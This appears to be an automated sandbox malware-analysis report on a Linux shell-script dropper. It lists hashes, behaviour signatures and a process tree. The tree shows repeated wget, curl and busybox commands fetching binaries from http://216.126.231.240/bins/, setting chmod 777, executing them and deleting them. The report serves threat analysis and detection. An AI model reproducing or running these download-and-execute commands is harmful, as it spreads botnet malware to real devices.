Analysis
-
max time kernel
83s -
max time network
123s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
14-11-2024 02:43
Static task
static1
Behavioral task
behavioral1
Sample
812e12d6dad4d488f8b8d39147e247dbe6b94a9474f1f98f5c9962f115845618.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
812e12d6dad4d488f8b8d39147e247dbe6b94a9474f1f98f5c9962f115845618.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
812e12d6dad4d488f8b8d39147e247dbe6b94a9474f1f98f5c9962f115845618.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
812e12d6dad4d488f8b8d39147e247dbe6b94a9474f1f98f5c9962f115845618.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
812e12d6dad4d488f8b8d39147e247dbe6b94a9474f1f98f5c9962f115845618.sh
-
Size
10KB
-
MD5
682075683081d9fc281b9f47dbc13513
-
SHA1
a2abfb0ba39a3deacc4cd4cc13539ae72b7e1ec9
-
SHA256
812e12d6dad4d488f8b8d39147e247dbe6b94a9474f1f98f5c9962f115845618
-
SHA512
7122fd7e2576ed1a72dc091536927c59e3e7c57c43165431b710449d59bd4df65913b942b8ce34d710d042d29c55c58cca994ca61be785e2f33a169412e0ee52
-
SSDEEP
192:m/h372hBD3KaKVRcABDoKaKVR8LV/r37Z:5nD1ABDo/
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid Process 838 chmod 892 chmod 898 chmod 846 chmod 858 chmod 918 chmod 759 chmod 768 chmod 904 chmod 912 chmod 852 chmod 866 chmod 880 chmod 886 chmod 936 chmod 796 chmod 809 chmod 826 chmod 832 chmod 872 chmod 682 chmod 701 chmod 718 chmod 736 chmod 924 chmod 930 chmod 690 chmod 818 chmod -
Executes dropped EXE 28 IoCs
Processes:
ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFShyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRRPjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlVqxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQlaiau4cN6ui4dUhdtLO7AszWQd9X2AFpm21TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpjMMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJnQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFRgKXcUWSnaVAlkPeODets4f6GbEr74zFmNMqOpad8fEABX2m6C2lykVUYrbhlTb579lU1XeSlCkRjhDywGAQfziHeoondE5FGa7JIQAeD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHyebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPSMMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJnQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFRgKXcUWSnaVAlkPeODets4f6GbEr74zFmNM1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpjqOpad8fEABX2m6C2lykVUYrbhlTb579lU1XeSlCkRjhDywGAQfziHeoondE5FGa7JIQAeD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHyebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPSODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFShyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRRPjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlVqxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQlaiau4cN6ui4dUhdtLO7AszWQd9X2AFpm2ioc pid Process /tmp/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS 683 ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS /tmp/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR 691 hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR /tmp/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV 702 PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV /tmp/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ 719 qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ /tmp/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm2 737 laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm2 /tmp/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj 760 1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj /tmp/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ 770 MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ /tmp/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI 797 nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI /tmp/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR 810 7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR /tmp/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM 819 gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM /tmp/qOpad8fEABX2m6C2lykVUYrbhlTb579lU1 827 qOpad8fEABX2m6C2lykVUYrbhlTb579lU1 /tmp/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA 833 XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA /tmp/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy 839 eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy /tmp/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS 847 ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS /tmp/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ 853 MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ /tmp/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI 859 nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI /tmp/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR 867 7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR /tmp/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM 873 gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM /tmp/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj 881 1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj /tmp/qOpad8fEABX2m6C2lykVUYrbhlTb579lU1 887 qOpad8fEABX2m6C2lykVUYrbhlTb579lU1 /tmp/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA 893 XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA /tmp/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy 899 eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy /tmp/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS 905 ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS /tmp/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS 913 ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS /tmp/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR 919 hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR /tmp/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV 925 PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV /tmp/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ 931 qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ /tmp/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm2 937 laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm2 -
Checks CPU configuration 1 TTPs 28 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc Process File opened for modification /tmp/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm2 curl File opened for modification /tmp/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI curl File opened for modification /tmp/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS curl File opened for modification /tmp/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA curl File opened for modification /tmp/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR curl File opened for modification /tmp/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM curl File opened for modification /tmp/qOpad8fEABX2m6C2lykVUYrbhlTb579lU1 curl File opened for modification /tmp/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy curl File opened for modification /tmp/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS curl File opened for modification /tmp/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR curl File opened for modification /tmp/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS curl File opened for modification /tmp/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ curl File opened for modification /tmp/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ curl File opened for modification /tmp/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj curl File opened for modification /tmp/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ curl File opened for modification /tmp/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM curl File opened for modification /tmp/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy curl File opened for modification /tmp/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR curl File opened for modification /tmp/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR curl File opened for modification /tmp/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV curl File opened for modification /tmp/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI curl File opened for modification /tmp/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA curl File opened for modification /tmp/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV curl File opened for modification /tmp/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ curl File opened for modification /tmp/qOpad8fEABX2m6C2lykVUYrbhlTb579lU1 curl File opened for modification /tmp/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS curl File opened for modification /tmp/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm2 curl File opened for modification /tmp/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj curl
Processes
-
/tmp/812e12d6dad4d488f8b8d39147e247dbe6b94a9474f1f98f5c9962f115845618.sh/tmp/812e12d6dad4d488f8b8d39147e247dbe6b94a9474f1f98f5c9962f115845618.sh1⤵PID:649
-
/bin/rm/bin/rm bins.sh2⤵PID:656
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵PID:660
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:669
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵PID:678
-
-
/bin/chmodchmod 777 ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵
- File and Directory Permissions Modification
PID:682
-
-
/tmp/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS./ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵
- Executes dropped EXE
PID:683
-
-
/bin/rmrm ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵PID:684
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵PID:685
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:688
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵PID:689
-
-
/bin/chmodchmod 777 hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵
- File and Directory Permissions Modification
PID:690
-
-
/tmp/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR./hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵
- Executes dropped EXE
PID:691
-
-
/bin/rmrm hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵PID:692
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵PID:693
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:694
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵PID:697
-
-
/bin/chmodchmod 777 PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵
- File and Directory Permissions Modification
PID:701
-
-
/tmp/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV./PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵
- Executes dropped EXE
PID:702
-
-
/bin/rmrm PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵PID:703
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵PID:705
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:709
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵PID:715
-
-
/bin/chmodchmod 777 qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵
- File and Directory Permissions Modification
PID:718
-
-
/tmp/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ./qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵
- Executes dropped EXE
PID:719
-
-
/bin/rmrm qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵PID:721
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵PID:722
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:728
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵PID:732
-
-
/bin/chmodchmod 777 laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵
- File and Directory Permissions Modification
PID:736
-
-
/tmp/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm2./laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵
- Executes dropped EXE
PID:737
-
-
/bin/rmrm laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵PID:738
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵PID:739
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵PID:755
-
-
/bin/chmodchmod 777 1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵
- File and Directory Permissions Modification
PID:759
-
-
/tmp/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj./1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵
- Executes dropped EXE
PID:760
-
-
/bin/rmrm 1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵PID:761
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵PID:762
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:765
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵PID:766
-
-
/bin/chmodchmod 777 MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵
- File and Directory Permissions Modification
PID:768
-
-
/tmp/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ./MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵
- Executes dropped EXE
PID:770
-
-
/bin/rmrm MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵PID:772
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵PID:773
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:779
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵PID:790
-
-
/bin/chmodchmod 777 nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵
- File and Directory Permissions Modification
PID:796
-
-
/tmp/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI./nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵
- Executes dropped EXE
PID:797
-
-
/bin/rmrm nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵PID:799
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵PID:800
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:805
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵PID:808
-
-
/bin/chmodchmod 777 7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR./7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵
- Executes dropped EXE
PID:810
-
-
/bin/rmrm 7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵PID:811
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵PID:812
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:816
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵PID:817
-
-
/bin/chmodchmod 777 gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵
- File and Directory Permissions Modification
PID:818
-
-
/tmp/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM./gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵
- Executes dropped EXE
PID:819
-
-
/bin/rmrm gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵PID:820
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵PID:821
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:822
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵PID:825
-
-
/bin/chmodchmod 777 qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵
- File and Directory Permissions Modification
PID:826
-
-
/tmp/qOpad8fEABX2m6C2lykVUYrbhlTb579lU1./qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵
- Executes dropped EXE
PID:827
-
-
/bin/rmrm qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵PID:828
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵PID:829
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:830
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵PID:831
-
-
/bin/chmodchmod 777 XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵
- File and Directory Permissions Modification
PID:832
-
-
/tmp/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA./XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵
- Executes dropped EXE
PID:833
-
-
/bin/rmrm XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵PID:834
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵PID:835
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:836
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵PID:837
-
-
/bin/chmodchmod 777 eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵
- File and Directory Permissions Modification
PID:838
-
-
/tmp/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy./eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵
- Executes dropped EXE
PID:839
-
-
/bin/rmrm eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵PID:840
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵PID:841
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:842
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵PID:845
-
-
/bin/chmodchmod 777 ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵
- File and Directory Permissions Modification
PID:846
-
-
/tmp/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS./ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵
- Executes dropped EXE
PID:847
-
-
/bin/rmrm ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵PID:848
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵PID:849
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:850
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵PID:851
-
-
/bin/chmodchmod 777 MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵
- File and Directory Permissions Modification
PID:852
-
-
/tmp/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ./MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵
- Executes dropped EXE
PID:853
-
-
/bin/rmrm MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵PID:854
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵PID:855
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:856
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵PID:857
-
-
/bin/chmodchmod 777 nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵
- File and Directory Permissions Modification
PID:858
-
-
